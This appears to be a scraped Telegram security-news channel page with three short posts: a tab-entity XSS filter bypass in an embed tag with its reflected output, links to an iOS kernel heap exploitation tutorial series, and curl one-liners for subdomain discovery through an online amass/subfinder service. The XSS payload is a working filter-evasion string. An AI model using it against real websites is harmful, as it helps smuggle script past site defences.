Information Security
408 subscribers
157 photos
5 videos
9 files
2.28K links
Information Security News

we are @sec_nerd twin brother
Download Telegram
Weird XSS filter bypass today:
<embed><embed src="jav&Tab;ascript:al&Tab;ert()"

Reflected as:
<embed src="jav&Tab;ascript:al&Tab;ert()">
Continuing the iOS exploit development series:

Part 1: Heap Exploit Development: https://azeria-labs.com/heap-exploit-development-part-1/

Part 2: Heap Overflows and the iOS Kernel Heap https://azeria-labs.com/heap-overflows-and-the-ios-kernel-heap/


NEW: Part 3: Grooming the iOS Kernel Heap https://azeria-labs.com/grooming-the-ios-kernel-heap/
Easy Asset discovery

curl -s -X POST --data "url=$1&Submit1=Submit" https://suip.biz/?act=amass | grep $1 | cut -d ">" -f 2 | awk 'NF' | uniq

curl -s -X POST --data "url=$1&Submit1=Submit" https://suip.biz/?act=subfinder | grep $1 | cut -d ">" -f 2 | awk 'NF' | uniq